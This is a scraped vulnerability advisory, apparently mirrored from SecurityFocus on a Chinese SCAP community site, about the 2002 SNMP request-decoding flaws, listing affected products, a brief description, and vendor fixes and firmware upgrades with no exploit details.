+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1
+ Check Point Software VPN-1 4.1
Net-SNMP ucd-snmp 4.2.2
Innerdive Solutions Router IP Console 3.3 .0.407
HP JetDirect x.21.00
HP JetDirect x.08.32

- 不受影响的程序版本

SGI Brocade 2.6 .0d
Nokia IPSO 3.4.2
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1
+ Check Point Software Firewall-1 4.1
+ Check Point Software Firewall-1 4.0 SP8
+ Check Point Software Firewall-1 4.0 SP8
+ Check Point Software Firewall-1 4.0 SP7
+ Check Point Software Firewall-1 4.0 SP7
+ Check Point Software Firewall-1 4.0 SP6
+ Check Point Software Firewall-1 4.0 SP6
+ Check Point Software Firewall-1 4.0 SP5
+ Check Point Software Firewall-1 4.0 SP5
+ Check Point Software Firewall-1 4.0 SP4
+ Check Point Software Firewall-1 4.0 SP4
+ Check Point Software Firewall-1 4.0 SP3
+ Check Point Software Firewall-1 4.0 SP3
+ Check Point Software Firewall-1 4.0 SP2
+ Check Point Software Firewall-1 4.0 SP2
+ Check Point Software Firewall-1 4.0 SP1
+ Check Point Software Firewall-1 4.0 SP1
+ Check Point Software Firewall-1 4.0
+ Check Point Software Firewall-1 4.0
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1
+ Check Point Software VPN-1 4.1
Net-SNMP ucd-snmp 4.2.2
Innerdive Solutions Router IP Console 3.3 .0.407
HP JetDirect x.21.00
HP JetDirect x.08.32

- 漏洞讨论

SNMP requests are messages sent from manager to agent systems. They typically poll the agent for current performance or configuration information, ask for the next SNMP object in a Management Information Base (MIB), or modify the configuration settings of the agent.

Multiple vulnerabilities have been discovered in a number of SNMP implementations. The vulnerabilities are known to exist in the process of decoding and interpreting SNMP request messages.

Among the possible consequences are denial of service and allowing attackers to compromise target systems. These depend on the individual vulnerabilities in each affected product.

- 漏洞利用

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Microsoft has released fixes which addresses this issue.

Cisco has released upgrades. Contact the vendor.

Fixes for Windows NT 4 Terminal Server English and German editions were re-released due to file problems in the original versions.

Nokia fixes for affected versions are available for download directly from Nokia.

Novell will address this issue in NetWare 6 Support Pack 1 and NetWare 5.1 Support Pack 6. Novell has made fixes available for version 4.11 through 6.0.

Multinet and TCPWare users should contact Process Software directly.

AdventNet will release a service pack for all users of their products around February 20, 2002.

Comtek products will be fixed with version 3.5 to be released some time in February 2002.

Lantronix will address this issue in LRS firmware version B1.3/611(020123).

The default installation of HP Secure OS Software for Linux does not include SNMP. Users who have enabled SNMP on HP Secure OS Software for Linux systems are advised to download the RPMs released by Red Hat.

HP Network Node Manager and Emanate Agents are included with ITO/VPO/OVO on Unix, OVO Windows and VPW/OVO Windows. The appropriate HP NNM/Emanate Agents fixes should be installed with these products. The HP OV/SAM Suite version 3.0.1 is prone to trap handling issues when run as an agent. Further details about how the OV/SAM Suite is affected and how to address the issue may be found in the attached advisory (HPSBUX0202-184).

SGI has released advisory 20030405-01-I to address this issue in Brocade firmware.

SGI has released advisory 20030703-01-I to address this issue in Emulex 1Gbit FibreChannel Hub firmware.

Fixes are available for a number of systems:


HP JetDirect x.08.00
  • HP X.21.00
    JetDirect firmware version X.21.00 is not vulnerable.JetDirect Product Numbers that can be freely upgraded to X.08.32, X.21.00 or higher firmware:EIO (Peripherals LaserJet 4000, 5000, 8000, etc...)J3110A 10T [G.08.40]J3111A 10T/10B2/LocalTalk [G.08.40]J3112A Token

  • HP X.21.00
    Jetdirect firmware versions previous to X.08.32 are vulnerable, where X is a letter 'A' through 'K'.JetDirect Product Numbers that can be freely upgraded to X.21.00 or higher firmware:EIO (Peripherals Laserjet 4000, 5000, 8000, ..)J3110A 10TJ3111A 10T/10B2/LocalTalkJ3112A Token Ring (discontinued)J3


HP Procurve Switch 8000M
  • HP C.09.13
    Fixed version of firmware for HP Procurve Switch 1600M (J4120A), HP Procurve Switch 2400M (J4120A), HP Procurve Switch 2424M (J4122A), HP Procurve Switch 4000M (J4121A), and HP Procurve Switch 8000M (J4110A).
    http://www.hp.com/rnd/software/switches.htm


3Com PS Hub 40

Microsoft Windows NT Enterprise Server 4.0 SP1

IBM AIX 5.1

Microsoft Windows NT Terminal Server 4.0 SP1

Microsoft Windows NT Server 4.0 SP1

Microsoft Windows NT Terminal Server 4.0 SP6

3Com Dual Speed Hub

HP Procurve Switch 2400M
  • HP C.09.13
    Fixed version of firmware for HP Procurve Switch 1600M (J4120A), HP Procurve Switch 2400M (J4120A), HP Procurve Switch 2424M (J4122A), HP Procurve Switch 4000M (J4121A), and HP Procurve Switch 8000M (J4110A).
    http://www.hp.com/rnd/software/switches.htm


Microsoft Windows NT Server 4.0 SP6

Microsoft Windows 2000 Server SP1

Microsoft Windows NT Server 4.0 SP2

Microsoft Windows XP Professional

Microsoft Windows 2000 Server

HP Procurve Switch 4000M
  • HP C.09.13
    Fixed version of firmware for HP Procurve Switch 1600M (J4120A), HP Procurve Switch 2400M (J4120A), HP Procurve Switch 2424M (J4122A), HP Procurve Switch 4000M (J4121A), and HP Procurve Switch 8000M (J4110A).
    http://www.hp.com/rnd/software/switches.htm


Microsoft Windows 2000 Datacenter Server

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows NT Workstation 4.0 SP2

HP Procurve Switch 4108GL

Microsoft Windows NT Workstation 4.0 SP4

Caldera UnixWare 7

Microsoft Windows NT Terminal Server 4.0 SP2

Microsoft Windows 2000 Datacenter Server SP1

3Com PS Hub 50

Microsoft Windows 2000 Professional SP2

3Com Switch 4400

Microsoft Windows 2000 Professional

Microsoft Windows 98

HP JetDirect x.20.00
  • HP X.21.00
    JetDirect firmware version X.21.00 is not vulnerable.JetDirect Product Numbers that can be freely upgraded to X.08.32, X.21.00 or higher firmware:EIO (Peripherals LaserJet 4000, 5000, 8000, etc...)J3110A 10T [G.08.40]J3111A 10T/10B2/LocalTalk [G.08.40]J3112A Token


3Com WebCache 1000

Microsoft Windows NT Workstation 4.0

Microsoft Windows NT Server 4.0

HP HP-UX (VVOS) 11.0 4

SNMP Research Mid-Level Manager 15.3
  • SNMP Research Mid-Level Manager 15.3.1.7
    Mid-Level Manager 15.3.1.7 is available directly from SNMP Research.


Oracle Enterprise Manager 2.0

Sun SunMC 3.0

Sun SunMC 3.0 RR

Sun Enterprise 10000 Server SSP 3.5

HP OpenView Network Node Manager 4.1 1 Solaris

Novell Netware 4.11

IBM AIX 4.3.2

HP OpenView Network Node Manager 5.0 1 Solaris

Real Networks RealPlayer Intranet 5.0

Juniper Networks JUNOS 5.0
  • Juniper Networks JUNOS 5.2
    JUNOS 5.2 is available directly from Juniper Networks.


HP OpenView Network Node Manager 5.0 1

HP OpenView Network Node Manager 5.0 1 HP-UX

HP OpenView Distributed Management 5.0 3

Lotus Domino SNMP Agents 5.0.1 Solaris x86

Caldera OpenServer 5.0.5

Caldera OpenServer 5.0.6

Juniper Networks JUNOS 5.1
  • Juniper Networks JUNOS 5.2
    JUNOS 5.2 is available directly from Juniper Networks.


HP OpenView Distributed Management 6.0

HP OpenView Network Node Manager 6.0 HP-UX 11.X

HP OpenView Network Node Manager 6.0 NT 4.X/Windows 2000

Novell Netware 6.0

Caldera UnixWare 7.1 .0

Oracle Enterprise Manager 9.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站